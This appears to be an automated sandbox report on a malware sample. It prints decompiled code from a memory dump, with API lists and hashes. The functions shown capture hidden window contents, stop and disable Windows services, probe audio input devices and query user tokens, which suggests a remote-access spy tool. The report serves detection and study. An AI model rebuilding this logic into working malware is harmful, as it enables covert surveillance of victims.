                                                                                    • API ID: Create$BlockEnvironmentLibraryLoadProcess$AddressAllocateCheckDestroyFreeInitializeMembershipProcTokenUserVersion
                                                                                    • String ID: D$WTSQueryUserToken$Wtsapi32.dll
                                                                                    • API String ID: 2441965042-1631787044
                                                                                    • Opcode ID: 07679bc921c39e977cd1045ecc53b0f4eaababe7862b343a5fae772a9d4cd578
                                                                                    • Instruction ID: 182173419655e0cb36daccb3ca6a3a225d4ae8f748a3ff903aa7581b13d584e5
                                                                                    • Opcode Fuzzy Hash: 07679bc921c39e977cd1045ecc53b0f4eaababe7862b343a5fae772a9d4cd578
                                                                                    • Instruction Fuzzy Hash: E4219272A0020ABBDF209FA59D05FFE7F78EB84715F144069FE05A6140EA74E9029B90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 81%
                                                                                    			E04EB99B0() {
                                                                                    				signed int _v8;
                                                                                    				short _v528;
                                                                                    				signed int _t9;
                                                                                    				signed int _t13;
                                                                                    				signed int _t14;
                                                                                    				void* _t16;
                                                                                    				void* _t20;
                                                                                    				void* _t22;
                                                                                    				void* _t23;
                                                                                    				void* _t26;
                                                                                    				void* _t27;
                                                                                    				void* _t28;
                                                                                    				signed int _t30;
                                                                                    
                                                                                    				_t9 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t9 ^ _t30;
                                                                                    				_push(_t22);
                                                                                    				_push(_t28);
                                                                                    				_push(_t26);
                                                                                    				_push(0);
                                                                                    				_t24 = L"winssyslog";
                                                                                    				E04EC6330(_t22, L"winssyslog",  &_v528, _t26, _t28, 8);
                                                                                    				_t13 = GetFileAttributesW( &_v528);
                                                                                    				_t27 = CloseHandle;
                                                                                    				_t23 = UnmapViewOfFile;
                                                                                    				_t14 = _t13 & 0xffffff00 | _t13 != 0xffffffff;
                                                                                    				 *0x4f068c9 = _t14;
                                                                                    				L1:
                                                                                    				while(1) {
                                                                                    					if(_t14 != 0) {
                                                                                    						L4:
                                                                                    						E04EBB5E0(_t23, _t24, _t27, _t36);
                                                                                    						_t14 =  *0x4f068c9; // 0x0
                                                                                    						if(_t14 != 1) {
                                                                                    							L7:
                                                                                    							_t24 =  *0x4f06adc; // 0x0
                                                                                    							if(_t24 != 0) {
                                                                                    								_t16 =  *(_t24 + 4);
								if(_t16 != 0) {
									TerminateThread(_t16, 0xffffffff);
									_t20 =  *0x4f06adc; // 0x0
									CloseHandle( *(_t20 + 4));
									_t24 =  *0x4f06adc; // 0x0
									 *(_t24 + 4) = 0;
								}
								UnmapViewOfFile(_t24);
								CloseHandle( *0x4f06ad8);
								_t14 =  *0x4f068c9; // 0x0
								 *0x4f06adc = 0;
							}
							continue;
						}
						do {
							Sleep(0x64);
							_t14 =  *0x4f068c9; // 0x0
						} while (_t14 == 1);
						goto L7;
					} else {
						do {
							Sleep(0x64);
							_t36 =  *0x4f068c9;
						} while ( *0x4f068c9 == 0);
						goto L4;
					}
				}
			}

APIs
• Part of subcall function 04EC6330: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04EC6356
• GetFileAttributesW.KERNEL32(?), ref: 04EB99E4
• Sleep.KERNEL32(00000064), ref: 04EB9A12
• Sleep.KERNEL32(00000064), ref: 04EB9A32
• TerminateThread.KERNEL32(?,000000FF), ref: 04EB9A51
• CloseHandle.KERNEL32(?), ref: 04EB9A5F
• UnmapViewOfFile.KERNEL32(00000000), ref: 04EB9A6F
• CloseHandle.KERNEL32 ref: 04EB9A77
Strings
Memory Dump Source
• Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
Yara matches
Similarity
• API ID: CloseFileHandleSleep$AttributesDirectorySystemTerminateThreadUnmapView
• String ID: 0et$winssyslog
• API String ID: 3677296445-3892780803
• Opcode ID: 9cf74b29e1117b4effd3163d5eb57ff8454a3e49d785990aa19cb90ff9fa57c8
• Instruction ID: 5534afe4c9c5805832c4f97dc740719b26dbbe5e1c5df67207a34d2827dcf4ee
• Opcode Fuzzy Hash: 9cf74b29e1117b4effd3163d5eb57ff8454a3e49d785990aa19cb90ff9fa57c8
• Instruction Fuzzy Hash: 7D212B705012589FEB10AF24FC04F657BAAFB81314F448598D5D1C7282CB39BC65CFA0
Uniqueness Score: -1.00%

APIs
• GetWindowRect.USER32 ref: 04EB76D3
• CreateCompatibleDC.GDI32 ref: 04EB76DA
• CreateCompatibleBitmap.GDI32(?,?,?), ref: 04EB7713
• SelectObject.GDI32(00000000,00000000), ref: 04EB771E
• PrintWindow.USER32(00000000,00000000,00000000,?,?,?), ref: 04EB7735
• PrintWindow.USER32(00000000,00000000,00000002,?,?,?), ref: 04EB773B
• PrintWindow.USER32(00000000,00000000,00000000,?,?,?), ref: 04EB7745
• BitBlt.GDI32(?,?,?,00000000,?,00000000,00000000,00000000,00CC0020), ref: 04EB7792
• DeleteObject.GDI32(?), ref: 04EB77A2
• DeleteDC.GDI32(00000000), ref: 04EB77A9
Memory Dump Source
• Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
Yara matches
Similarity
• API ID: Window$Print$CompatibleCreateDeleteObject$BitmapRectSelect
• String ID:
• API String ID: 718922780-0
• Opcode ID: 468ac7fce85c1d268f1902ec167def2d9061d0c6b5ca1441a7b4624399e8d75f
• Instruction ID: 54790dcf24373e68eb17680ff4c1990dc37e88196a5ba8f087e28e5e7cdd67e5
• Opcode Fuzzy Hash: 468ac7fce85c1d268f1902ec167def2d9061d0c6b5ca1441a7b4624399e8d75f
• Instruction Fuzzy Hash: D7313C71A00608AFDB02DBB5DC58AAEBBBCEF89351F104225F805F3144EB34A9818A60
Uniqueness Score: -1.00%

C-Code - Quality: 91%
			E04EC3930(void* __ebx, short* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v32;
				struct _SERVICE_STATUS _v36;
				int _v40;
				signed int _t10;
				void* _t28;
				void* _t36;
				short* _t38;
				void* _t39;
				void* _t40;
				signed int _t41;

				_t10 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t10 ^ _t41;
				_t38 = __ecx;
				_v40 = 0;
				_t28 = OpenSCManagerW(0, 0, 0xf003f);
				if(_t28 == 0) {
					return E04ED572E(_v8 ^ _t41);
				} else {
					_t36 = OpenServiceW(_t28, _t38, 0xf01ff);
					if(_t36 != 0) {
						_t39 = 0;
						do {
							if(QueryServiceStatus(_t36,  &_v36) == 0) {
								goto L6;
							} else {
								if(_v32 == 1) {
									_t40 = LockServiceDatabase(_t28);
									if(_t40 != 0) {
										_v40 = ChangeServiceConfigW(_t36, 0xffffffff, 4, 0xffffffff, 0, 0, 0, 0, 0, 0, 0);
										UnlockServiceDatabase(_t40);
									}
								} else {
									ControlService(_t36, 1,  &_v36);
									Sleep(0x1f4);
									goto L6;
								}
							}
							L10:
							CloseServiceHandle(_t36);
							goto L11;
							L6:
							_t39 = _t39 + 0x1f4;
						} while (_t39 < 0x1388);
						goto L10;
					}
					L11:
					CloseServiceHandle(_t28);
					return E04ED572E(_v8 ^ _t41);
				}
			}


APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 04EC3951
• OpenServiceW.ADVAPI32(00000000,?,000F01FF), ref: 04EC3968
• QueryServiceStatus.ADVAPI32(00000000,?,?,000F01FF), ref: 04EC397B
• ControlService.ADVAPI32(00000000,00000001,?,?,000F01FF), ref: 04EC3992
• Sleep.KERNEL32(000001F4,?,000F01FF), ref: 04EC399D
• LockServiceDatabase.ADVAPI32(00000000), ref: 04EC39B4
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000F01FF), ref: 04EC39D5
• UnlockServiceDatabase.ADVAPI32(00000000), ref: 04EC39DF
• CloseServiceHandle.ADVAPI32(00000000,?,000F01FF), ref: 04EC39E6
• CloseServiceHandle.ADVAPI32(00000000,?,000F01FF), ref: 04EC39ED
Memory Dump Source
• Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
Yara matches
Similarity
• API ID: Service$CloseDatabaseHandleOpen$ChangeConfigControlLockManagerQuerySleepStatusUnlock
• String ID:
• API String ID: 3671983395-0
• Opcode ID: 2ee261bd80f4434270077c917e34c50414b5ca093e66dfbfb4c0e1646cca3210
• Instruction ID: 9962b1e3cfe954c411d6474363f418eb87586aac76221a7056e7af69afbe0e7b
• Opcode Fuzzy Hash: 2ee261bd80f4434270077c917e34c50414b5ca093e66dfbfb4c0e1646cca3210
• Instruction Fuzzy Hash: 9C21CB31701214ABC7109BA69D489BEF7B8EFC5712F10426FFD06E2288DA79DC058760
Uniqueness Score: -1.00%

C-Code - Quality: 91%
			E04EB75A0(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t18;
				struct HWND__* _t20;
				int _t29;
				void* _t36;
				intOrPtr* _t44;
				struct HWND__* _t47;
				signed int _t48;
				void* _t50;
				void* _t55;

				_t50 = (_t48 & 0xffffffc0) - 0x34;
				_t36 = __ecx;
				_t18 = CreateCompatibleBitmap( *(__ecx + 0x14),  *(__ecx + 0x3c),  *(__ecx + 0x40));
				 *(__ecx + 0x1c) = _t18;
				SelectObject( *(__ecx + 0x18), _t18);
				_t20 = GetTopWindow(0);
				if(_t20 == 0) {
					L12:
					GetDIBits( *(_t36 + 0x18),  *(_t36 + 0x1c), 0,  *(_t36 + 0x40),  *(_t36 + 0x10), _t36 + 0x38, 0);
					DeleteObject( *(_t36 + 0x1c));
					return  *(_t36 + 0x10);
				}
				_t47 = GetWindow(_t20, 1);
				if(_t47 == 0) {
					goto L12;
				}
				_t44 = _t36 + 0x20;
				do {
					if(IsWindowVisible(_t47) != 0) {
						_t55 =  *((intOrPtr*)(_t44 + 0x10)) - 6;
						if(_t55 > 0 || _t55 == 0 &&  *((intOrPtr*)(_t44 + 0x14)) >= 3) {
							_t29 = 1;
						} else {
							_t29 = 0;
						}
						asm("movsd xmm0, [edi+0x8]");
						asm("movsd [esp], xmm0");
						E04EB76A0(_t36, _t47,  *_t44, _t44, _t47,  *((intOrPtr*)(_t44 + 4)), _t29);
						_t50 = _t50 - 8 + 0x10;
						SetWindowLongA(_t47, 0xffffffec, GetWindowLongA(_t47, 0xffffffec) | 0x02000000);
						if( *((intOrPtr*)(_t44 + 0x10)) < 6) {
							E04EB77D0(_t47, _t44);
							_t50 = _t50 + 4;
						}
					}
					_t47 = GetWindow(_t47, 3);
				} while (_t47 != 0);
				goto L12;
			}

                                                                                    0x04eb7657
                                                                                    0x04eb7657
                                                                                    0x04eb764d
                                                                                    0x04eb7663
                                                                                    0x04eb7665
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 04EB75B7
                                                                                    • SelectObject.GDI32(?,00000000), ref: 04EB75C4
                                                                                    • GetTopWindow.USER32(00000000), ref: 04EB75CC
                                                                                    • GetWindow.USER32(00000000,00000001), ref: 04EB75DD
                                                                                    • IsWindowVisible.USER32 ref: 04EB75F1
                                                                                    • GetWindowLongA.USER32 ref: 04EB7634
                                                                                    • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 04EB7643
                                                                                    • GetWindow.USER32(00000000,00000003), ref: 04EB765D
                                                                                    • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 04EB767D
                                                                                    • DeleteObject.GDI32(?), ref: 04EB7686
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Window$LongObject$BitmapBitsCompatibleCreateDeleteSelectVisible
                                                                                    • String ID:
                                                                                    • API String ID: 358708372-0
                                                                                    • Opcode ID: cde6c1ce9a0d210d3e013d016c0c7d2f58377cbb895b34440c60b8b35e304ecb
                                                                                    • Instruction ID: 170995320b571fd95b81c1a7951055adcbe7b23cf959266ba6340900288219c4
                                                                                    • Opcode Fuzzy Hash: cde6c1ce9a0d210d3e013d016c0c7d2f58377cbb895b34440c60b8b35e304ecb
                                                                                    • Instruction Fuzzy Hash: DA21D271600611ABDB126F68DC48E9B7B69FF84312F000955FD42DA599E725ED20CBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E04EE84BC(char _a4) {
                                                                                    				char _v8;
                                                                                    
                                                                                    				_t26 = _a4;
                                                                                    				_t52 =  *_a4;
                                                                                    				if( *_a4 != 0x4ef7988) {
                                                                                    					E04EE8159(_t52);
                                                                                    					_t26 = _a4;
                                                                                    				}
                                                                                    				E04EE8159( *((intOrPtr*)(_t26 + 0x3c)));
                                                                                    				E04EE8159( *((intOrPtr*)(_a4 + 0x30)));
                                                                                    				E04EE8159( *((intOrPtr*)(_a4 + 0x34)));
                                                                                    				E04EE8159( *((intOrPtr*)(_a4 + 0x38)));
                                                                                    				E04EE8159( *((intOrPtr*)(_a4 + 0x28)));
                                                                                    				E04EE8159( *((intOrPtr*)(_a4 + 0x2c)));
                                                                                    				E04EE8159( *((intOrPtr*)(_a4 + 0x40)));
                                                                                    				E04EE8159( *((intOrPtr*)(_a4 + 0x44)));
                                                                                    				E04EE8159( *((intOrPtr*)(_a4 + 0x360)));
                                                                                    				_v8 =  &_a4;
                                                                                    				E04EE8382(5,  &_v8);
                                                                                    				_v8 =  &_a4;
                                                                                    				return E04EE83D2(4,  &_v8);
                                                                                    			}




                                                                                    0x04ee84c2
                                                                                    0x04ee84c5
                                                                                    0x04ee84cd
                                                                                    0x04ee84d0
                                                                                    0x04ee84d5
                                                                                    0x04ee84d8
                                                                                    0x04ee84dc
                                                                                    0x04ee84e7
                                                                                    0x04ee84f2
                                                                                    0x04ee84fd
                                                                                    0x04ee8508
                                                                                    0x04ee8513
                                                                                    0x04ee851e
                                                                                    0x04ee8529
                                                                                    0x04ee8537
                                                                                    0x04ee853f
                                                                                    0x04ee8548
                                                                                    0x04ee8550
                                                                                    0x04ee8564

                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 04EE84D0
                                                                                      • Part of subcall function 04EE8159: HeapFree.KERNEL32(00000000,00000000,?,04EE0EDA,00000001,00000001), ref: 04EE816F
                                                                                      • Part of subcall function 04EE8159: GetLastError.KERNEL32(3D21FB31,?,04EE0EDA,00000001,00000001), ref: 04EE8181
                                                                                    • _free.LIBCMT ref: 04EE84DC
                                                                                    • _free.LIBCMT ref: 04EE84E7
                                                                                    • _free.LIBCMT ref: 04EE84F2
                                                                                    • _free.LIBCMT ref: 04EE84FD
                                                                                    • _free.LIBCMT ref: 04EE8508
                                                                                    • _free.LIBCMT ref: 04EE8513
                                                                                    • _free.LIBCMT ref: 04EE851E
                                                                                    • _free.LIBCMT ref: 04EE8529
                                                                                    • _free.LIBCMT ref: 04EE8537
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 58c059ad8b7848498c3d77b1050574b7a09343a11f93380d6b087ac180e1be24
                                                                                    • Instruction ID: 69e0a939ed73f49f519197d54be01ce29181c0f07a5545476236b91fcc1a0a0a
                                                                                    • Opcode Fuzzy Hash: 58c059ad8b7848498c3d77b1050574b7a09343a11f93380d6b087ac180e1be24
                                                                                    • Instruction Fuzzy Hash: 2811B676100508FFEB01FF96EC41DED3BA5FF04254B4165A6BA189F221DA32FA509B81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04EB2027
                                                                                    • waveInGetNumDevs.WINMM ref: 04EB2032
                                                                                      • Part of subcall function 04EB1190: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,74E5F5E0,?,04EB205E), ref: 04EB11A9
                                                                                      • Part of subcall function 04EB1190: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,74E5F5E0,?,04EB205E), ref: 04EB11B6
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000001,0000003F), ref: 04EB2082
                                                                                    • Sleep.KERNEL32(00000096), ref: 04EB208D
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 04EB20A9
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04EB20CE
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EB20D7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateEvent$ObjectSingleWait$CloseDevsHandleSleepwave
                                                                                    • String ID: |
                                                                                    • API String ID: 1906678132-2343686810
                                                                                    • Opcode ID: 2e95787efe0fb0cb7d0cd9361e64a4ac5000945ff27d839ed0dddb80f0770082
                                                                                    • Instruction ID: 916d89396377101e94a747842d9c54be8bba6be96c446c3d4b0c2d287392bd49
                                                                                    • Opcode Fuzzy Hash: 2e95787efe0fb0cb7d0cd9361e64a4ac5000945ff27d839ed0dddb80f0770082
                                                                                    • Instruction Fuzzy Hash: 0E31A571A40304BFFB109FA4DC85FAA7FA4EF04714F104159FA54AE2C5D6B5AA50CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,04EEFC6F), ref: 04EF02B6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DecodePointer
                                                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                    • API String ID: 3527080286-3064271455
                                                                                    • Opcode ID: 8922a99e786f4138ddd696629fc63ee809f7ac803166490ab9df183f3760db0f
                                                                                    • Instruction ID: 2b71296d47f3222d8646496f68f58a99f32740a824ec6c5c9c6309158177e9c0
                                                                                    • Opcode Fuzzy Hash: 8922a99e786f4138ddd696629fc63ee809f7ac803166490ab9df183f3760db0f
                                                                                    • Instruction Fuzzy Hash: D9519B70A0150DCBDF10CFA8EE485FDBBB0FF48318F1021A4E685AA656DB35BA24CB15
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 55%
                                                                                    			E04EBAF90(intOrPtr* __ecx, signed int _a4, char _a5) {
                                                                                    				intOrPtr* _v8;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				signed int _t33;
                                                                                    				void* _t34;
                                                                                    				signed int* _t35;
                                                                                    				signed int* _t41;
                                                                                    				signed int _t43;
                                                                                    				signed int* _t44;
                                                                                    				signed char _t47;
                                                                                    				signed int* _t57;
                                                                                    				intOrPtr* _t63;
                                                                                    				void* _t65;
                                                                                    				intOrPtr* _t67;
                                                                                    				signed char _t71;
                                                                                    				signed char _t72;
                                                                                    				signed int _t74;
                                                                                    				intOrPtr* _t75;
                                                                                    				signed int* _t80;
                                                                                    				void* _t83;
                                                                                    				void* _t85;
                                                                                    				void* _t88;
                                                                                    				intOrPtr _t89;
                                                                                    				signed int _t91;
                                                                                    				void* _t94;
                                                                                    				void* _t101;
                                                                                    
                                                                                    				_t67 = __ecx;
                                                                                    				_push(__ecx);
                                                                                    				_t33 = _a4;
                                                                                    				_push(_t88);
                                                                                    				_t63 = __ecx;
                                                                                    				 *__ecx = 0x4efd8b0;
                                                                                    				 *((intOrPtr*)(__ecx + 4)) = _t33;
                                                                                    				_v8 = __ecx;
                                                                                    				 *((intOrPtr*)(_t33 + 0x38)) = __ecx;
                                                                                    				_t34 = CreateEventW(0, 1, 0, 0);
                                                                                    				_t83 = Sleep;
                                                                                    				 *(_t63 + 8) = _t34;
                                                                                    				_t35 =  *0x4f06adc; // 0x0
                                                                                    				 *_t63 = 0x4efd8a0;
                                                                                    				if(_t35 != 0) {
                                                                                    					L5:
                                                                                    					_push(_t67);
                                                                                    					_push(0x3f);
                                                                                    					_a5 = _t35[0x83];
                                                                                    					_push(2);
                                                                                    					_push( &_a4);
                                                                                    					_a4 = 0x7e;
                                                                                    					E04EB1C60( *((intOrPtr*)(_t63 + 4)));
                                                                                    					WaitForSingleObject( *(_t63 + 8), 0xffffffff);
                                                                                    					Sleep(0x96);
                                                                                    					E04EBB6B0(_t63, _t63, _t83, _t88, _t98);
                                                                                    					_t41 =  *0x4f06adc; // 0x0
                                                                                    					_a4 =  *_t41;
                                                                                    					while(1) {
                                                                                    						_t89 =  *((intOrPtr*)(_t63 + 4));
                                                                                    						_t43 =  *(_t89 + 0x5c) & 0x0000ffff;
                                                                                    						if(_t43 != 1) {
                                                                                    							goto L10;
                                                                                    						}
                                                                                    						_t75 =  *((intOrPtr*)(_t89 + 0x20));
                                                                                    						if(_t75 == 0) {
                                                                                    							goto L10;
                                                                                    						} else {
                                                                                    							_t101 =  *((intOrPtr*)( *_t75 + 0x40))();
                                                                                    							L14:
                                                                                    							if(_t101 != 0) {
                                                                                    								_t80 =  *0x4f06adc; // 0x0
                                                                                    								_t91 = _a4;
                                                                                    								_t74 =  *_t80;
                                                                                    								if(_t74 != _t91) {
                                                                                    									_t50 =  <  ? _t74 : _t74 - _t91;
                                                                                    									_t85 = ( <  ? _t74 : _t74 - _t91) + ( <  ? _t74 : _t74 - _t91);
                                                                                    									_t23 = _t85 + 1; // 0x74e06491
                                                                                    									_t65 = LocalAlloc(0x40, _t23);
                                                                                    									_t26 = _t65 + 1; // 0x1
                                                                                    									 *_t65 = 0x7f;
                                                                                    									E04EDDC90(_t26,  &(_t80[0x105]) + _t91 * 2, _t85);
                                                                                    									_t28 = _t85 + 1; // 0x74e06491
                                                                                    									_t94 = _t94 + 8;
                                                                                    									_push(0x3f);
                                                                                    									_push(_t65);
                                                                                    									E04EB1C60( *((intOrPtr*)(_v8 + 4)));
                                                                                    									LocalFree(_t65);
                                                                                    									_t57 =  *0x4f06adc; // 0x0
                                                                                    									_t63 = _v8;
                                                                                    									_a4 =  *_t57;
                                                                                    								}
                                                                                    								Sleep(0x12c);
                                                                                    								continue;
                                                                                    							}
                                                                                    						}
                                                                                    						L18:
                                                                                    						_t44 =  *0x4f06adc; // 0x0
                                                                                    						__eflags = _t44[0x83];
                                                                                    						_t71 =  ==  ? 0 :  *0x4f068c9 & 0x000000ff;
                                                                                    						__eflags = _t71;
                                                                                    						 *0x4f068c9 = _t71;
                                                                                    						return _t63;
                                                                                    						goto L19;
                                                                                    						L10:
                                                                                    						__eflags = _t43 - 2;
                                                                                    						if(_t43 == 2) {
                                                                                    							_t72 =  *(_t89 + 0x24);
                                                                                    							__eflags = _t72;
                                                                                    							if(_t72 != 0) {
                                                                                    								_t47 =  *((intOrPtr*)( *((intOrPtr*)(_t72 + 4)) + 0x40))();
                                                                                    								__eflags = _t47;
                                                                                    								if(_t47 != 0) {
                                                                                    									__eflags =  *(_t89 + 0x48);
                                                                                    									goto L14;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    						goto L18;
                                                                                    					}
                                                                                    				} else {
                                                                                    					 *0x4f068c9 = 1;
                                                                                    					_t88 = 0;
                                                                                    					asm("o16 nop [eax+eax]");
                                                                                    					while(_t35 == 0) {
                                                                                    						Sleep(0x64);
                                                                                    						if(_t88 == 0x63) {
                                                                                    							 *0x4f068c9 = 0;
                                                                                    							return _t63;
                                                                                    						} else {
                                                                                    							_t35 =  *0x4f06adc; // 0x0
                                                                                    							_t88 = _t88 + 1;
                                                                                    							_t98 = _t88 - 0x64;
                                                                                    							if(_t88 < 0x64) {
                                                                                    								continue;
                                                                                    							} else {
                                                                                    								goto L5;
                                                                                    							}
                                                                                    						}
                                                                                    						goto L19;
                                                                                    					}
                                                                                    					goto L5;
                                                                                    				}
                                                                                    				L19:
                                                                                    			}
                                                                                    0x04ebaf90
                                                                                    0x04ebaf93
                                                                                    0x04ebaf94
                                                                                    0x04ebaf98
                                                                                    0x04ebaf9a
                                                                                    0x04ebafa2
                                                                                    0x04ebafa8
                                                                                    0x04ebafad
                                                                                    0x04ebafb0
                                                                                    0x04ebafb3
                                                                                    0x04ebafb9
                                                                                    0x04ebafbf
                                                                                    0x04ebafc2
                                                                                    0x04ebafc7
                                                                                    0x04ebafcf
                                                                                    0x04ebaff8
                                                                                    0x04ebaffe
                                                                                    0x04ebb002
                                                                                    0x04ebb004
                                                                                    0x04ebb00a
                                                                                    0x04ebb00c
                                                                                    0x04ebb00d
                                                                                    0x04ebb011
                                                                                    0x04ebb01b
                                                                                    0x04ebb026
                                                                                    0x04ebb02a
                                                                                    0x04ebb02f
                                                                                    0x04ebb036
                                                                                    0x04ebb040
                                                                                    0x04ebb040
                                                                                    0x04ebb043
                                                                                    0x04ebb04a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebb04c
                                                                                    0x04ebb051
                                                                                    0x00000000
                                                                                    0x04ebb053
                                                                                    0x04ebb058
                                                                                    0x04ebb097
                                                                                    0x04ebb097
                                                                                    0x04ebb099
                                                                                    0x04ebb09f
                                                                                    0x04ebb0a2
                                                                                    0x04ebb0a6
                                                                                    0x04ebb0ae
                                                                                    0x04ebb0b7
                                                                                    0x04ebb0ba
                                                                                    0x04ebb0c9
                                                                                    0x04ebb0cd
                                                                                    0x04ebb0d0
                                                                                    0x04ebb0d4
                                                                                    0x04ebb0dc
                                                                                    0x04ebb0df
                                                                                    0x04ebb0e5
                                                                                    0x04ebb0e8
                                                                                    0x04ebb0e9
                                                                                    0x04ebb0ef
                                                                                    0x04ebb0f5
                                                                                    0x04ebb0fa
                                                                                    0x04ebb105
                                                                                    0x04ebb105
                                                                                    0x04ebb10d
                                                                                    0x00000000
                                                                                    0x04ebb10d
                                                                                    0x04ebb097
                                                                                    0x04ebb114
                                                                                    0x04ebb114
                                                                                    0x04ebb124
                                                                                    0x04ebb12d
                                                                                    0x04ebb12d
                                                                                    0x04ebb130
                                                                                    0x04ebb139
                                                                                    0x00000000
                                                                                    0x04ebb06e
                                                                                    0x04ebb06e
                                                                                    0x04ebb071
                                                                                    0x04ebb077
                                                                                    0x04ebb07a
                                                                                    0x04ebb07c
                                                                                    0x04ebb088
                                                                                    0x04ebb08b
                                                                                    0x04ebb08d
                                                                                    0x04ebb093
                                                                                    0x00000000
                                                                                    0x04ebb093
                                                                                    0x04ebb08d
                                                                                    0x04ebb07c
                                                                                    0x00000000
                                                                                    0x04ebb071
                                                                                    0x04ebafd1
                                                                                    0x04ebafd1
                                                                                    0x04ebafd8
                                                                                    0x04ebafda
                                                                                    0x04ebafe0
                                                                                    0x04ebafe6
                                                                                    0x04ebafeb
                                                                                    0x04ebb060
                                                                                    0x04ebb06b
                                                                                    0x04ebafed
                                                                                    0x04ebafed
                                                                                    0x04ebaff2
                                                                                    0x04ebaff3
                                                                                    0x04ebaff6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebaff6
                                                                                    0x00000000
                                                                                    0x04ebafeb
                                                                                    0x00000000
                                                                                    0x04ebafe0
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,04EB9B4C,?,Function_000568D8,00000000), ref: 04EBAFB3
                                                                                    • Sleep.KERNEL32(00000064,?,?,?,?,?,04EB9B4C,?,Function_000568D8,00000000), ref: 04EBAFE6
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000002,0000003F,?,?,?,?,?,?,04EB9B4C,?), ref: 04EBB01B
                                                                                    • Sleep.KERNEL32(00000096,?,?,?,?,?,?,04EB9B4C,?), ref: 04EBB026
                                                                                    • LocalAlloc.KERNEL32(00000040,74E06491,?,?,?,?,?,?,04EB9B4C,?), ref: 04EBB0C3
                                                                                    • LocalFree.KERNEL32(00000000,00000000,74E06491,0000003F), ref: 04EBB0EF
                                                                                    • Sleep.KERNEL32(0000012C,?,?,?,?,?,?,04EB9B4C,?), ref: 04EBB10D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Sleep$Local$AllocCreateEventFreeObjectSingleWait
                                                                                    • String ID: ~
                                                                                    • API String ID: 824083382-1707062198
                                                                                    • Opcode ID: 9930325bda0228d7c7069a62753e9e839639b985134bcb8e9feeee6ef7ec9554
                                                                                    • Instruction ID: 6416573a68a0315be12c66a89d01c6be8d8a98e7e344897ba7ad14d64c761e45
                                                                                    • Opcode Fuzzy Hash: 9930325bda0228d7c7069a62753e9e839639b985134bcb8e9feeee6ef7ec9554
                                                                                    • Instruction Fuzzy Hash: 5051C235700244AFEB24DF28D884BAABBE5FF49714F4481A8E946DF646C675FC50CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 44%
                                                                                    			E04EBB6B0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                    				signed int _v8;
                                                                                    				short _v528;
                                                                                    				long _v532;
                                                                                    				void* _v536;
                                                                                    				intOrPtr _v540;
                                                                                    				void* _v544;
